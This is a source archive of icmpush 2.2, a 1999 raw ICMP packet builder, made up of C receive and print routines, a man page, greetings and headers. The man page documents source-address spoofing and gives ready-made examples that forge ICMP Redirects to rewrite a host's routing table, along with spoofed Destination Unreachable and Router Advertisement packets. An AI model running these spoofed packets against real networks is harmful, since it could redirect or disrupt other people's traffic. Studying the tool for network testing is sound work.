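         (icmp_rcv->icmp_type != (icmp_info_or_err[type].reply) ) ) {
        /* Not the reply type that was asked for. */
        if ( more_verbose ) {
            LINE;
            fprintf(stdout, "%s ...\n", inet_ntoa(ip->ip_src));
            print_err_pack( icmp_rcv );
            LINE;
        }
        return;
    }

    /* Control of ID and Seq can't be made within an ICMP Router Advertisement */
    if ( icmp_rcv->icmp_type != ICMP_ROUTER_ADVERT ) {
        if ( icmp_rcv->icmp_id != id ) {
            LINE;
#ifdef SPANISH
            fprintf(stdout, "%-15s -> Id de ICMP incorrecto...\n", inet_ntoa(ip->ip_src) );
#else
            fprintf(stdout, "%-15s -> Wrong ICMP Id...\n", inet_ntoa(ip->ip_src) );
#endif
            if ( more_verbose )
                print_err_pack ( icmp_rcv );
            LINE;
            return;
        }
        if ( icmp_rcv->icmp_seq != seqnum ) {
            LINE;
#ifdef SPANISH
            fprintf(stdout,"%-15s -> Número de secuencia incorrecto...\n", inet_ntoa(ip->ip_src));
#else
            fprintf(stdout,"%-15s -> Incorrect Sequence number...\n", inet_ntoa(ip->ip_src));
#endif
            if ( more_verbose )
                print_err_pack( icmp_rcv );
            LINE;
            return;
        }
    }

    /*
     * NOTE(review): h_name is whatever reverse DNS returns for an address
     * taken from the received packet, and it is printed unfiltered.
     */
    thishost = NULL;
    if ( resolve )
        thishost = gethostbyaddr((char *)&ip->ip_src, 4, AF_INET );
    if ( thishost )
        fprintf(stdout, "%-15s ", thishost->h_name);
    else
        fprintf(stdout, "%-15s ", inet_ntoa(ip->ip_src));

    /* Go to the appropriate ICMP print reply function ... */
    (*icmp_info_or_err[icmp_rcv->icmp_type].print_packet) ( ip->ip_src, icmp_rcv );
}

/*
 * Table entry for ICMP types that are not expected as a reply.  Indexes
 * icmp_info_or_err[] with the received type, so it must only be reached
 * through print_pack(), which validates that type first.
 */
void dont_print( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
#ifdef SPANISH
    fprintf(stdout, "(%s 0x%X) -> Comorrl? No es posible\n",
            icmp_info_or_err[icmp_rcv->icmp_type].name, icmp_rcv->icmp_type);
#else
    fprintf(stdout, "(%s 0x%X) -> Uuuu? Not possible\n",
            icmp_info_or_err[icmp_rcv->icmp_type].name, icmp_rcv->icmp_type);
#endif
}

/***********************************/
/* Print an ICMP Info Reply packet */
/***********************************/
void print_info_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
    fprintf(stdout, "-> %s\n", icmp_info_or_err[icmp_rcv->icmp_type].name);
}

/*****************************************/
/* Print an ICMP Time stamp Reply packet */
/*****************************************/
/*
 * The transmit timestamp (milliseconds) is reduced to seconds and shown as
 * hh:mm:ss through localtime().  The value is kept in a real time_t: the
 * previous code passed the address of a u_long cast to time_t *, which
 * reads the wrong number of bytes wherever the two types differ in size.
 */
void print_timestamp_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
    struct tm *tiempo;
    time_t secs;

    /* Time when this reply was sent by the dest ... */
    secs = (time_t)(ntohl(icmp_rcv->icmp_ttime)/1000);
    tiempo = localtime(&secs);

    if ( more_verbose ) {
#ifdef SPANISH
        fprintf(stdout, "-> %s transmitido a las %.2d:%.2d:%.2d\n",
                icmp_info_or_err[icmp_rcv->icmp_type].name,
                tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#else
        fprintf(stdout, "-> %s transmited at %.2d:%.2d:%.2d\n",
                icmp_info_or_err[icmp_rcv->icmp_type].name,
                tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
#endif
    } else {
        fprintf(stdout, "-> %.2d:%.2d:%.2d\n",
                tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec);
    }
}

/*******************************************/
/* Print an ICMP Address Mask Reply packet */
/*******************************************/
void print_address_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
    struct in_addr mascara;

    mascara.s_addr = icmp_rcv->icmp_mask;

    if ( more_verbose )
        fprintf(stdout, "-> %s (%s)\n",
                icmp_info_or_err[icmp_rcv->icmp_type].name, inet_ntoa(mascara));
    else
        fprintf(stdout, "-> %s\n", inet_ntoa( mascara ) );
}

/*********************************************/
/* Print an ICMP Router Advertisement packet */
/*********************************************/
/*
 * Prints one line per advertised router followed by the lifetime.
 *
 * NOTE(review): the loop trusts icmp_num_addr from the packet and this
 * function is not told how many bytes were received, so a packet that
 * claims more entries than it carries is printed from whatever follows it
 * in the receive buffer (read_icmp() zeroes that buffer before each read).
 */
void print_router_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
    int entry;
    u_int life;
    struct id_rdiscovery *data_rdisc;
    struct hostent *thishost;

    fprintf(stdout, "-> %s\n", icmp_info_or_err[icmp_rcv->icmp_type].name);

    data_rdisc = (struct id_rdiscovery *) &icmp_rcv->icmp_rdiscovery;

    for ( entry=1; entry <= icmp_rcv->icmp_num_addr; entry++, data_rdisc++) {
#ifdef SPANISH
        fprintf(stdout, " Dirección ");
#else
        fprintf(stdout, " Address ");
#endif
        thishost = NULL;
        if ( resolve )
            thishost = gethostbyaddr((char *)&data_rdisc->router_addr, 4, AF_INET );
        if ( thishost )
            fprintf(stdout, "%-2d= %s ", entry, thishost->h_name);
        else
            fprintf(stdout, "%-2d= %s ", entry, inet_ntoa(data_rdisc->router_addr));

        /* ntohl() yields a 32-bit value; convert it to match %ld. */
        fprintf(stdout, " Prefer. -> %ld\n",
                (long)ntohl(data_rdisc->pref_level.s_addr) );
    }

    fprintf(stdout, " Lifetime = ");
    life = ntohs(icmp_rcv->icmp_lifetime);

    if ( life < 60 )
        fprintf(stdout, "%02d secs\n", life);
    else if ( life < 3600 )
        fprintf(stdout, "%02d:%02d min\n", life / 60, life % 60);
    else
        fprintf(stdout, "%02d:%02d:%02d hours\n", life / 3600,
                (life % 3600) / 60, life % 60);
}

/***********************************/
/* Print an ICMP Echo Reply packet */
/***********************************/
/*
 * When the request carried a user pattern (is_pattern) only the type name
 * is printed.  Otherwise the payload holds the send time written by
 * envia_icmp_info() and the difference to the current time is printed.
 */
void print_echo_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv )
{
    u_long sent_time;

    if ( is_pattern ) {
        fprintf(stdout, "-> %s\n", icmp_info_or_err[icmp_rcv->icmp_type].name);
        return;
    }

    /* Time when our request was sent by us ... */
    copymem( icmp_rcv->icmp_data, (char *)&sent_time, sizeof(sent_time));

    if ( more_verbose ) {
#ifdef SPANISH
        fprintf(stdout, "-> %s con RTT = %.1f ms\n",
                icmp_info_or_err[icmp_rcv->icmp_type].name,
                (float)(day2milisecs() - ntohl(sent_time)) );
#else
        fprintf(stdout, "-> %s with RTT = %.1f ms\n",
                icmp_info_or_err[icmp_rcv->icmp_type].name,
                (float)(day2milisecs() - ntohl(sent_time)) );
#endif
    } else {
        fprintf(stdout, "-> %.1f ms\n",
                (float)(day2milisecs() - ntohl(sent_time)) );
    }
}

/*****************************/
/* Print an ICMP packet that */
/* doesn't correspond to us  */
/*****************************/
/*
 * The type comes straight from a received packet.  It is looked up in
 * icmp_info_or_err[] only when it is a valid index; the previous
 * "<= MAX(...)" test would accept an index one past the table if MAX()
 * yields the element count, as its use in envia_icmp_err() suggests.
 */
void print_err_pack( struct icmp2 *icmp_rcv )
{
    const int num_types = (int)(sizeof(icmp_info_or_err) / sizeof(icmp_info_or_err[0]));
#ifdef SPANISH
    char *type = "Desconocido";
#else
    char *type = "Unknown";
#endif

    if ( icmp_rcv->icmp_type < num_types )
        type = icmp_info_or_err[icmp_rcv->icmp_type].name;

#ifdef SPANISH
    fprintf(stdout," Tipo = %s (0x%X)\n", type, icmp_rcv->icmp_type);
    fprintf(stdout," Código = 0x%-4X Checksum = 0x%X\n", icmp_rcv->icmp_code,
            icmp_rcv->icmp_cksum);
    fprintf(stdout," Ident. = 0x%-4X Num_sec = 0x%X\n", icmp_rcv->icmp_id,
            icmp_rcv->icmp_seq);
#else
    fprintf(stdout, " Type = %s (0x%X)\n", type, icmp_rcv->icmp_type);
    fprintf(stdout, " Code = 0x%-4X Checksum = 0x%X\n", icmp_rcv->icmp_code,
            icmp_rcv->icmp_cksum);
    fprintf(stdout, " Id = 0x%-4X Seq# = 0x%X\n", icmp_rcv->icmp_id,
            icmp_rcv->icmp_seq);
#endif
}

/***********************/
/* Our SIGALRM handler */
/***********************/
/* Jumps back into read_icmp(), which then leaves its receive loop. */
void timeout_func( int nothing )
{
    siglongjmp( myjmp, 1);
}

/**********************************************/
/* This function has been obtained from the   */
/* book "UNIX NETWORK PROGRAMMING" (1st Ed.), */
/* by Richard W. Stevens (Hyper-Guru).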
*/
/* ;) */
/**********************************************/
/*
 * in_cksum: 16-bit one's-complement checksum over the n bytes at p.
 * The data is summed as 16-bit words (a trailing odd byte is added as the
 * first byte of an otherwise zero word), the carries are folded back into
 * the low 16 bits and the complement of the result is returned.
 */
int in_cksum( u_short *p, int n)
{
    long total = 0;
    u_short last_word = 0;
    u_short result;

    for ( ; n > 1; n -= 2 )
        total += *p++;

    /* mop up an odd byte, if necessary */
    if ( n == 1 ) {
        *(u_char *)(&last_word) = *(u_char *)p;
        total += last_word;
    }

    total = (total >> 16) + (total & 0xffff);   /* add hi 16 to low 16 */
    total += (total >> 16);                     /* add carry */
    result = ~total;                            /* ones-complement, truncate */
    return (result);
}

/* pasa: return the inet_ntoa() text form of sin->sin_addr. */
char *pasa( struct sockaddr_in *sin )
{
    char *text = (char *) inet_ntoa(sin->sin_addr);

    return text;
}

/***************************************/
/* Exit from program without returning */
/* a system error. The returned code   */
/* == num_error.                       */
/***************************************/
/*
 * The message mensaje_err[num_error][LNG] is written to stderr when
 * num_error is non-zero, or when verbose is set.
 */
void salir( int num_error )
{
    int show_message = (num_error != 0) || verbose;

    if ( show_message )
        fprintf(stderr, "%s: %s\n", prog, mensaje_err[num_error][LNG]);
    exit(num_error);
}

/***********************************/
/* Exit from program returning the */
/* system error.                   */
/* Return num_error to the system. */
/***********************************/
/*
 * Always prints mensaje_err[num_error][LNG] followed by the system text
 * for the current errno.
 */
void salir_con_error( int num_error )
{
    fprintf(stderr,"%s: %s -> %s\n", prog, mensaje_err[num_error][LNG],
            sys_errlist[errno] );
    exit(num_error);
}

/****************************/
/* Init my packet struct    */
/* with the default values.
*/ /****************************/ void init_packet_struct( struct my_pack *packet ) { packet->ip_spoof = 0x0000; packet->destino.sin_family = AF_INET; packet->destino.sin_addr.s_addr = 0x0001; packet->gway = 0x0001; packet->dest_red = 0x0001; packet->orig = 0x0001; packet->cod_icmp = 0; packet->tipo_icmp = 255; packet->protocol = IPPROTO_TCP; packet->p_origen = 0; packet->p_destino = 0; packet->maskaddr = 0; packet->router = NULL; packet->lifetime = LIFETIME_DFL; packet->num_routers = 0; packet->size_pattern = 0; packet->timeout = TIMEOUT_DFL; packet->garbage = 0; packet->pointer = 0; } icmpush-2.2.orig/icmpush.80100644000175000017500000004126106664227443013667 0ustar domdom.\" Man page for ICMPush (c) Slayer .\" =============================== .\" .\" You may distribute under the terms of the GNU General Public .\" License as specified in the LICENSE file that comes with the .\" ICMPush v2.2 distribution. .\" .\" Man page author: .\" wait_man .\" Date: .\" Mon Feb 8 01:16:09 CET 1999 .\" Translate from the Spanish to English by: .\" BINARIA .\" .TH "ICMPUSH" "8" "February 22, 1999" "icmpush v2.2" .SH "NAME" icmpush \- ICMP packet builder .SH "SYNOPSIS" .B icmpush .I type [options] host .SH "DESCRIPTION" .B icmpush is a tool that builds ICMP packets fully customized from command line. It supports the following ICMP error types: \fIRedirect\fP, \fISource Quench\fP, \fITime Exceeded\fP, \fIDestination Unreach\fP and \fIParameter Problem\fP. And the following ICMP information types: \fIAddress Mask Request\fP, \fITimestamp\fP, \fIInformation Request\fP, \fIEcho Request\fP, \fIRouter Solicitation\fP and \fIRouter Advertisement\fP. Is not of our concern to give a fully description of how ICMP protocol works, but the more knowledgement we have we can fully understand its management, use and posibilities of this tool. 
The number of arguments needed may seem excessive, but the author notes that some mandatory data must be given on the command line so that the ICMP packet being built fully conforms to the protocol format. A large number of examples is given in the \fIEXAMPLES\fP section of this page, showing real uses of this program.
.SH "OPTIONS"
.IP "\fB\-h\fP, \fB--help\fP"
Help.
.IP "\fB\-V\fP, \fB--version\fP"
Program version.
.IP "\fB\-v\fP, \fB--verbose\fP"
Informative mode.
.IP "\fB\-vv\fP, \fB--more_verbose\fP"
More informative. Useful when debugging.
.PP
The ICMP type \fItype\fP can be any of the following:
.IP "\fB\-du\fP, \fB--dest_unreach\fP"
Destination Unreach. IP packet couldn't be delivered. This ICMP type is \fIerror\fP.
.IP "\fB\-sq\fP, \fB--src_quench\fP"
Source Quench. IP packet is not delivered due to congestion on the net. This ICMP type is \fIerror\fP.
.IP "\fB\-red\fP, \fB--redirect\fP"
Redirect. Request to forward IP packets through another router. This ICMP type is \fIerror\fP.
.IP "\fB\-echo\fP, \fB--echo_request\fP"
Echo Request. Request sent to a host to receive an echo reply. This ICMP type is \fIinformation\fP.
.IP "\fB\-rta\fP, \fB--router_advert\fP \fIaddress\fP[\fI/preference\fP]"
Router Advertisement. Router transmits one or more routers with address \fIaddress\fP and preference \fIpreference\fP. If the preference is omitted, the default preference 0 is used. This ICMP type is \fIinformation\fP.
.IP "\fB\-rts\fP, \fB--router_solicit\fP"
Router Solicitation. Host request for a message from one or more routers. Like the previous type, it is part of the Router Discovery message exchange, and this ICMP type is \fIinformation\fP.
.IP "\fB\-tx\fP, \fB--time_exc\fP"
Time Exceeded. Time Exceeded for an IP packet. This ICMP type is \fIerror\fP.
.IP "\fB\-param\fP, \fB--param_problem\fP"
Parameter Problem. Erroneous value in a field of the IP header. This ICMP type is \fIerror\fP.
.IP "\fB\-tstamp\fP, \fB--timestamp\fP"
Timestamp.
Request from a host to receive the time of another host. This ICMP type is \fIinformation\fP. .IP "\fB\-info\fP, \fB--info_req\fP" Information Request. Request from a host to receive an Info Reply from another host. This ICMP type is \fIinformation\fP. .IP "\fB\-mask\fP, \fB--mask_req\fP" Address Mask Request. Used to find out a host network mask. This ICMP type is \fIinformation\fP. .PP The \fIoptions\fP can be any of the following: .IP "\fB\-sp\fP, \fB--spoof\fP \fIaddress\fP" IP address to be used as the source of the ICMP packet. .IP "\fB\-to\fP, \fB--timeout\fP \fIsecs\fP" Timeout in seconds to read the answers. Only valid for ICMPs of \fIinformation\fP type, except the Router Advertisement type (\fB-rta\fP). The default is 5 seconds. If 0 is given, the answers are not read. .IP "\fB\-n\fP, \fB--no_resolve\fP" Don't use name resolution. .IP "\fB\-lt\fP, \fB--lifetime\fP \fIsecs\fP" Lifetime in seconds of the router announcement. Only valid with the Router Advertisement (\fI-rta\fP) type. The default is 1800 seconds (30'). .IP "\fB\-gw\fP, \fB--gateway\fP \fIaddress\fP" Route gateway address in an ICMP Redirect (\fB-red\fP). By default it is the spoof address (\fB-sp\fP), if it has been specified, or the outgoing IP address if it has not been specified. .IP "\fB\-dest\fP, \fB--route_dest\fP \fIaddress\fP" Route destination address in an ICMP Redirect (\fB-red\fP). This is a required option when sending an ICMP Redirect. .IP "\fB\-orig\fP, \fB--orig_host\fP \fIaddress\fP" Original host within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. By default it is the same as the IP of the host that sends the ICMP packet. .IP "\fB\-psrc\fP, \fB--port_src\fP \fIport\fP" Source port (tcp or udp) within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. The default is 0. .IP "\fB\-pdst\fP, \fB--port_dest\fP \fIport\fP" Destination port (tcp or udp) within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. The default is 0. 
.IP "\fB\-prot\fP, \fB--protocol\fP \fIicmp\fP|\fItcp\fP|\fIudp\fP" Protocol to be used within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. Must be one of the three listed above. The default is tcp. .IP "\fB\-id\fP, \fB--echo_id\fP \fIidentifier\fP" Echo identifier within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP when the IP header protocol of the 64 bits data field (\fB-prot\fP) is icmp. The default is 0. .IP "\fB\-seq\fP, \fB--echo_seq\fP \fIsequence\fP" Echo sequence number within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP when the IP header protocol of the 64 bits data field (\fB-prot\fP) is icmp. The default is 0. .IP "\fB\-pat\fP, \fB--pattern\fP \fIpattern\fP" Data pattern to send in an Echo Request (\fB-echo\fP). .IP "\fB\-gbg\fP, \fB--garbage\fP \fIbytes\fP|\fImax\fP" Number of garbage bytes that will be sent in any ICMP packet. With \fImax\fP the maximum possible will be sent. .IP "\fB\-ptr\fP, \fB--pointer\fP \fIbyte\fP" Pointer to the erroneous byte \fIbyte\fP in an ICMP packet reporting a parameter problem. Valid only with the Parameter Problem type (\fB-param\fP). .IP "\fB\-c\fP, \fB--code\fP \fIcode\fP|\fInum\fP|\fImax\fP" ICMP code to send. Code \fIcode\fP is valid for the Destination Unreach (\fB-du\fP), Redirect (\fB-red\fP) and Time Exceeded (\fB-tx\fP) types. A numerical code \fInum\fP can be specified for the ICMP types that do not have codes (Echo Request, Information Request, Address Mask Request, Router Solicitation, Router Advertisement, Source Quench, Parameter Problem and Timestamp). With \fImax\fP an ICMP code higher than the allowed ones will be sent. The following \fIICMP CODES\fP section lists the valid \fIcode\fP values. .SH "ICMP CODES" The valid \fIcodes\fP to use with the Destination Unreach, Redirect and Time Exceeded types are: .IP "- Used with \fBDestination Unreach\fP type (\fB-du\fP):" .PP \fInet-unreach\fP (Net Unreachable) The destination net is unreachable. 
\fIhost-unreach\fP (Host Unreachable) The destination host is unreachable. \fIprot-unreach\fP (Protocol Unreachable) The desired protocol is not available on the destination host. \fIport-unreach\fP (Port Unreachable) The desired port is not available on the destination host. \fIfrag-needed\fP (Fragmentation Needed and Don't Fragment was Set) The IP packet had to be fragmented because of its size but the sender did not allow it by setting the DF (DON'T FRAGMENT) flag. \fIsroute-fail\fP (Source Route Failed) The route indicated in the IP packet could not be followed. \fInet-unknown\fP (Destination Network Unknown) The destination network is unknown. \fIhost-unknown\fP (Destination Host Unknown) The destination host is unknown but its network is known. \fIhost-isolated\fP (Source Host Isolated) The destination host cannot be reached. \fInet-ano\fP (Communication with Destination Network is Administratively Prohibited) Access to the destination network is denied by a firewall or similar on the receiver side. \fIhost-ano\fP (Communication with Destination Host is Administratively Prohibited) Access to the destination host is denied by a firewall or similar on the receiver side. \fInet-unr-tos\fP (Destination Network Unreachable for Type of Service) The destination network cannot be reached with the requested Type Of Service (TOS). \fIhost-unr-tos\fP (Destination Host Unreachable for Type of Service) The destination host cannot be reached with the requested TOS. \fIcom-admin-prohib\fP (Communication Administratively Prohibited) A router cannot forward a packet because of administrative filtering. \fIhost-precedence-viol\fP (Host Precedence Violation) The IP precedence of the packet is not allowed. \fIprecedence-cutoff\fP (Precedence cutoff in effect) An attempt was made to send a packet with an IP precedence lower than the minimum imposed by the network's administrators. .IP "- To be used with \fBRedirect\fP type (\fB-red\fP):" .PP \fInet\fP (Redirect Datagram for the Network) The destination is a network. \fIhost\fP (Redirect Datagram for the Host) The destination is a host. 
\fIserv-net\fP (Redirect Datagram for the Type Of Service and Network) The destination is a type of service and network. \fIserv-host\fP (Redirect Datagram for the Type Of Service and Host) The destination is a type of service and host. .PP and .IP "- To be used with \fBTime Exceeded\fP type (\fB-tx\fP):" .PP \fIttl\fP (Time to Live exceeded in Transit) The time to live in the header of an IP packet has expired. \fIfrag\fP (Fragment Reassembly Time Exceeded) The fragments of an IP packet could not be reassembled. .SH "RETURN CODES" \fBicmpush\fP can be easily used within shell scripts. The program returns the following codes to the shell: .ti Value Meaning .ti ----- ----------- .ti 0 Program finished OK. .ti 1 Incorrect number of arguments. .ti 2 Unknown ICMP protocol. .ti 3 Cannot create RAW socket type. .ti 4 Erroneous ICMP packet type. .ti 5 Erroneous gateway. .ti 6 Erroneous route destination. .ti 7 Erroneous ICMP packet code. .ti 8 Erroneous original host. .ti 9 Error sending packet. .ti 10 Protocol still not implemented. .ti 11 Incorrect spoof IP address or host. .ti 12 Could not allocate memory for the data_hdr union. .ti 13 Incorrect packet destination IP address or host. .ti 14 Unknown protocol. .ti 16 Error reading RAW socket. .ti 17 Error initializing signal handler SIGALRM. .ti 18 Echo Request packet data too big. .ti 19 Incorrect source port. .ti 20 Incorrect destination port. .ti 21 Incorrect timeout value. .ti 22 Incorrect Echo ID. .ti 23 Incorrect sequence number. .ti 24 Erroneous Echo data. .ti 25 IP_HDRINCL error. .ti 26 Erroneous router address in Router Advertisement. .ti 27 Incorrect number of garbage bytes. .ti 28 Incorrect ICMP Parameter Problem pointer. 
.SH "EXAMPLES" - In response to a packet send with TCP source port 100 and destination on port 90, we want to send and ICMP Redirect to asshole.es to modify its routing table with the following data: 10.12.12.12 as a gateway to the host death.es masking the packet source as if it was sent from infect.comx host: \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fI10.12.12.12\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI90 asshole.es\fP - In response to an ICMP packet Echo Request sent with Echo Request id 100 and Echo Request sequence number 90, we want to send an ICMP Redirect to the host hemorroids.es to modify its routing table with the following data: the host pizza.death as a gateway to the host death.es, masking the packet source as if iit was sent from infect.comx host. \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fIpizza.death\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fIicmp\fP \fB-id\fP \fI100\fP \fB-seq\fP \fI90 hemorroids.es\fP - We want to send an ICMP packet Destination Unreach to the host 10.2.3.4 saying that our TCP port number 20 connected with his TCP port 2100, is unreachable. We mask ourselves as host 10.1.1.1: \fBicmpush -du -sp\fP \fI10.1.1.1\fP \fB-c\fP \fIport-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI2100\fP \fB-pdst\fP \fI20 10.2.3.4\fP - We want to send an ICMP packet Destination Unreach to host 10.2.3.4 saying that the host inferno.hell and its TCP port 69, connected with his port TCP 666 in unreacheable. We mask ourselves as gateway router.comx: \fBicmpush -du -sp\fP \fIrouter.comx\fP \fB-c\fP \fIhost-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI666\fP \fB-pdst\fP \fI69\fP \fB-orig\fP \fIinferno.hell 10.2.3.4\fP - We want to send a packet ICMP Source Quench to host ldg02.hell in response to a packet destinated to host ldg00 with UDP protocol, source port 100 and destination port 200. 
We mask ourselves as gateway 10.10.10.1: \fBicmpush -sq -sp\fP \fI10.10.10.1\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - We want to send an ICMP packet Time Exceeded to host ldg02.hell in response to a packet destinated to host ldg00 with UDP protocol, source port 100 and destination port 200. We mask as gateway ldg04.hell: \fBicmpush -tx -sp\fP \fIldg04.hell\fP \fB-c\fP \fIfrag\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - We want to send an ICMP packet Address Mask Request and wait 10 seconds to see the replies. We mask the packet with source address of 10.2.3.4 and we send it to the address 10.0.1.255: \fBicmpush -mask -sp\fP \fI10.2.3.4\fP \fB-to\fP \fI10 10.0.1.255\fP - We want to send an ICMP packet Timestamp to host sepultura.hell. We mask the packet as if it were send from host 10.2.3.1. We use the default timeout (5 seconds): \fBicmpush -tstamp --spoof\fP \fI10.2.3.1 sepultura.hell\fP - We want to send an ICMP packet Information Request to host voucher.hell. The source address will be our own IP address, and the timeout will be 20 seconds: \fBicmpush -info -to\fP \fI20 voucher.hell\fP - We want to send an ICMP packet Router Solicitation to host lazy.hell. The source address will be our own IP address and the timeout will be 20 seconds: \fBicmpush -rts --timeout\fP \fI20 lazy.hell\fP - We want to send an ICMP packet Echo Request to host lazy.hell with the data pattern 'MyNameIsGump'. The source address will be our own IP address and the timeout to read the data will be 2 seconds: \fBicmpush -echo -data\fP \fIMyNameIsGump\fP \fB-to\fP \fI2 lazy.hell\fP - We want to send ICMP packet Echo Request to 10.12.0.255 with the following data pattern: 'D E A T H' (blanks included). 
We will mask the source address as 192.168.0.255, and we do not want to read the answers: \fBicmpush -echo -sp\fP \fI192.168.0.255\fP \fB-data\fP \fI'D E A T H'\fP \fB-to\fP \fI0 192.168.0.255\fP - We want to send an ICMP packet Destination Unreach to host destination.death but sending it with an ICMP code bigger to the legal ones adding also 60K of garbage data: \fBicmpush -du -c\fP \fImax\fP \fB-gbg\fP \fI60000 destination.death\fP - We want to send an ICMP Router Advertisement to host death.es, saying that the routers to use are: router1.xtc with preference 20, router2.xtc with preference 50 and router3.xtc with default preference (0). We mask ourselves as fatherouter.xtc \fBicmpush -rta\fP \fIrouter1.xtc/20\fP \fB-rta\fP \fIrouter2.xtc/50\fP \fB-rta\fP \fIrouter3.xtc\fP \fB-sp\fP \fIfatherouter.xtc death.es\fP - We send an ICMP Parameter Problem to host misery.es saying that the packet sent from the host hick.org with udp protocol, source port 13 and destination port 53, has an error on the IP header byte 13. We will also add all garbage bytes as possible: \fBicmpush -sp\fP \fIhick.org\fP \fB-param -ptr\fP \fI13\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI13\fP \fB-pdest\fP \fI53\fP \fB-gbg\fP \fImax\fP \fImisery.es\fP - We want to send an ICMP packet Timestamp to host www.hicks.org with code 38 instead of code (0) as usual: \fBicmpush -tstamp -c 38 \fIwww.hicks.org\fP .SH SEE ALSO Postel, John, "Internet Control Message Protocol - DARPA Internet Program Protocol Specification", \fIRFC 792\fP, USC/Information Sciences Institute, September 1981. Mogul, Jeffrey and John Postel, "Internet Standard Subnetting Procedure", \fIRFC 950\fP, Stanford, USC/Information Sciences Institute, August 1985. Braden, Robert, "Requeriments for Internet Hosts - Communication Layers", \fIRFC 1122\fP, USC/Information Sciences Institute, October 1989. Deering, Stephen, "ICMP Router Discovery Messages", \fIRFC 1256\fP, Xerox PARC, September 1991. 
Baker, Fred, "Requeriments for IP Version 4 Routers", \fIRFC 1812\fP, Cisco Systems, June 1995. The \fILinux source code\fP, everything referent to network code and to ICMP protocol. .SH AUTHOR Slayer icmpush-2.2.orig/GREETINGS0100644000175000017500000000173006664232213013364 0ustar domdom Spanish friends: Hades, Jfs, netsavage, sierra, wait_man (good man page!), Shinji, ngneer, Lec, Dairo, Lth, binaria (good work!) and ppl from the 'irc-hispano.org' channel #hack Rest of the world: Ken Williams (aka Packetstorm Tattooman) for their support and all of the ppl (like Sean) who send his opinions, bugs and suggestions to me. And last, but not least, my girlfriend, Conchi, that becomes my principal reason to live on (Yeah! And she hates computers!). ---------------- A "lovely" 'F**K U!' to the ppl who f*cked me for the only reason of enjoy working (and playing) at network security ... ... *YOU* know who you are. :_( --------------- Mi más sincero *JODETE* a las personas que me han amargado la vida últimamente por el hecho de gustarme la seguridad informática... ... sí, *VOSOTROS* sabéis quienes sois. :-( Madrid, 1999. Slay. 
icmpush-2.2.orig/err_msg.h0100644000175000017500000000513106662150773013730 0ustar domdom#ifndef __ERR_MSG_H__ #define __ERR_MSG_H__ char *mensaje_err[][2]= { { "Programa finalizado satisfactoriamente", "Program finished OK" }, { "Error en número de argumentos", "Wrong number of arguments" }, { "Protocolo ICMP desconocido", "Unknown ICMP protocol" }, { "No puedo crear socket tipo RAW", "Can't build RAW sockets" }, { "Tipo de paquete ICMP falta o es incorrecto", "Incorrect or missing ICMP packet type" }, { "Gateway incorrecto", "Wrong gateway" }, { "Destino de ruta falta o es incorrecto", "Incorrect or missing route destination" }, { "Código de paquete ICMP falta o es incorrecto", "Incorrect or missing ICMP packet code" }, { "Host original incorrecto", "Wrong original host" }, { "Error enviando paquete", "Error while sending packet" }, { "Protocolo todavía no implementado", "Protocol still not implemented" }, { "Dirección IP o host de spoof incorrecto", "Wrong spoof IP or hostname" }, { "No pude reservar memoria para unión data_hdr", "Can't allocate union data_hdr memory" }, { "Dirección IP o host destino falta o es incorrecto", "Missing or wrong destination IP or hostname" }, { "Protocolo desconocido", "Unknown protocol" }, { "No puedo crear socket de lectura RAW", "Can't build read RAW socket" }, { "Error leyendo socket RAW", "Error while reading RAW socket" }, { "Error al iniciar manejador de señal", "Error while initializing signal handler" }, { "Patrón de datos demasiado grande", "Data pattern too big. 
Don't be cruel :)" }, { "Puerto origen incorrecto", "Incorrect source port value" }, { "Puerto destino incorrecto", "Incorrect destination port value" }, { "Valor de timeout incorrecto", "Incorrect timeout value" }, { "Echo ID incorrecto", "Incorrect Echo ID value" }, { "Número de secuencia incorrecto", "Incorrect sequence number" }, { "Datos de Echo incorrectos", "Incorrect Echo data value" }, { "Error en IP_HDRINCL", "IP_HDRINCL error"}, { "Direccion de router incorrecta", "Incorrect router address" }, { "Bytes basura incorrectos", "Incorrect data garbage" }, { "Puntero incorrecto", "Incorrect pointer value" } }; #endif icmpush-2.2.orig/misc.h0100644000175000017500000000026206662417304013221 0ustar domdom#ifndef __MISC_H__ #define __MISC_H__ #define copymem( s, d, l) memcpy( d, s, l) #define iniciamem( d, l) memset( d, 0, l) #define MAX(x) ( sizeof(x)/sizeof(x[0]) ) #endif icmpush-2.2.orig/packet.h0100644000175000017500000000165206662420026013534 0ustar domdom#ifndef __PACKET_H__ #define __PACKET_H__ /* Linked list of Routers within an ICMP Router Advertisement */ struct router { u_long address; u_long pref; struct router *next; }; struct my_pack { u_long ip_spoof; struct sockaddr_in destino; u_long gway; u_long dest_red; u_long orig; int cod_icmp; u_short tipo_icmp; u_short protocol; u_short p_origen; u_short p_destino; u_long maskaddr; struct router *router; u_short lifetime; u_short num_routers; char *pattern; int size_pattern; int timeout; u_char pointer; u_long garbage; }; 